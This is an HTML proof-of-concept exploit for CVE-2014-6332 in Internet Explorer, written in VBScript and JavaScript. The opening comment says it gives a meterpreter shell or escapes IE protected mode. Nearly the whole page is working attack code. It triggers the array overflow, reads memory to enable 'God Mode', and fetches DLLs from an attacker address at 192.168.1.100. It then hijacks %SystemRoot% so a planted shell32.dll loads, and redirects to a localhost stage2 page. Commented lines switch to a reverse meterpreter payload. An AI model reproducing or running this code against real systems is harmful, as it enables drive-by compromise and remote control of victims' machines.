<!-- CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode - Tested on IE11 + Windows 7 64-bit References: - original PoC - http://www.exploit-db.com/exploits/35229/ - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html - https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf - http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb --> <script>// <![CDATA[ var oReq; function getdll(downloadFile) { oReq = new XMLHttpRequest(); oReq.open("GET", "http://192.168.1.100/"+downloadFile, true); oReq.onreadystatechange = handler; oReq.send(); } function handler() { if (oReq.readyState == 4 && oReq.status == 200) { OnDownloadDone(); } } function tolocal() { location.href = "http://localhost:5555/stage2.html" } // ]]></script> <script>// <![CDATA[ ' local server files to get medium integrity downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html") cacheRegex = Array("^ieshell32[d].dll$", "^ielocalserver[d].dll$", "^stage2[d].htm$") ' reverse meterpreter shell files 'downloadFiles = Array("ieshell32.dll", "metp.dll") 'cacheRegex = Array("^ieshell32[d].dll$", "^metp[d].dll$") Dim cacheFiles(3) Dim downloadState Dim pinTime Dim oFSO Dim oWS Dim shell function FindFile(path, regexFile) FindFile = "" For Each f in oFSO.GetFolder(path).Files If regexFile.Test(f.Name) Then FindFile = f.Name Exit For End If Next end function function SearchCache(path, regexFile) SearchCache = "" For Each fld in oFSO.GetFolder(path).SubFolders 'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then filename = FindFile(path & "" & fld.Name, regexFile) If filename <> "" Then SearchCache = path & "" & fld.Name & "" & filename Exit For End If 'End If Next end function function loaddll() On Error Resume Next Set wshSystemEnv = oWS.Environment("Process") tmpDir = oFSO.GetSpecialFolder(2) tmpSysDir = tmpDir & "System32" tmpShellFile = tmpSysDir & "shell32.dll" oFSO.CreateFolder(tmpSysDir) oFSO.CopyFile cacheFiles(0), tmpShellFile mydllFile = tmpDir & "" & downloadFiles(1) oFSO.CopyFile cacheFiles(1), mydllFile wshSystemEnv("MyDllPath") = mydllFile If (UBound(downloadFiles) = 2) Then stage2File = tmpDir & "stage2.html" oFSO.CopyFile cacheFiles(2), stage2File wshSystemEnv("stage2file") = stage2File End If saveRoot = wshSystemEnv("SystemRoot") wshSystemEnv("SaveSystemRoot") = saveRoot wshSystemEnv("SystemRoot") = tmpDir Set shell = CreateObject("Shell.Application") ' have to restore %SystemRoot% in dll, not here oFSO.DeleteFile tmpShellFile oFSO.DeleteFolder tmpSysDir If (UBound(downloadFiles) = 2) Then call tolocal() End If end function Sub OnDownloadDone() cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%") cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowContent.IE5" Set regexFile = new regexp regexFile.Pattern = cacheRegex(downloadState) cacheFiles(downloadState) = SearchCache(cacheDir, regexFile) If cacheFiles(downloadState) = "" Then Exit Sub End If If downloadState = UBound(downloadFiles) Then loaddll() Else downloadState = downloadState + 1 DoDownload() End If End Sub Sub DoDownload() pinTime = Now call getdll(downloadFiles(downloadState)) End Sub Sub runshell() Set oFSO = CreateObject("Scripting.FileSystemObject") Set oWS = CreateObject("WScript.Shell") downloadState = 0 DoDownload() End Sub // ]]></script> <script>// <![CDATA[ dim arrX() dim arrY() dim asize dim incsize dim olapPos Begin() function Begin() On Error Resume Next Init() If Exploit() = True Then EnableGodMode() redim Preserve arrX(asize) runshell() End If end function function Init() Randomize() asize = 13 + 17*rnd(6) incsize = 7 + 3*rnd(5) end function function Exploit() dim i Exploit = False For i = 0 To 400 asize = asize + incsize If Trigger() = True Then Exploit = True Exit For End If Next end function function Trigger() On Error Resume Next dim typev dim ofnumele Trigger = False olapPos = asize + 2 ofnumele = asize + &h8000000 redim Preserve arrX(asize) redim arrY(asize) redim Preserve arrX(ofnumele) typev = 1 arrY(0) = 1.123456789012345678901234567890 If (IsObject(arrX(olapPos-1)) = False) Then If (VarType(arrX(olapPos-1)) <> 0) Then If (IsObject(arrX(olapPos)) = False) Then typev = VarType(arrX(olapPos)) End If End If End If If (typev = &h2f66) Then Trigger = True Else redim Preserve arrX(asize) End If end function function ReadMemInt(addr) arrY(0) = 0 arrX(olapPos) = addr+4 arrY(0) = 8 ReadMemInt = lenb(arrX(olapPos)) end function function EnableGodMode() i = LeakFnAddr() i = ReadMemInt(i+8) i = ReadMemInt(i+16) myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000") arrX(olapPos+2) = myarray arrY(2) = 8192 + 12 EnableGodMode = False For k=0 To &h60 step 4 j = ReadMemInt(i+&h120+k) If (j = 14) Then arrX(olapPos+2)(i+&h11c+k) = arrY(4) EnableGodMode = True Exit For End If Next end function sub dummyfn() end sub function LeakFnAddr() On Error Resume Next i = dummyfn i = null arrY(0) = 0 arrX(olapPos) = i arrY(0) = 3 LeakFnAddr = arrX(olapPos) end function // ]]></script>
评论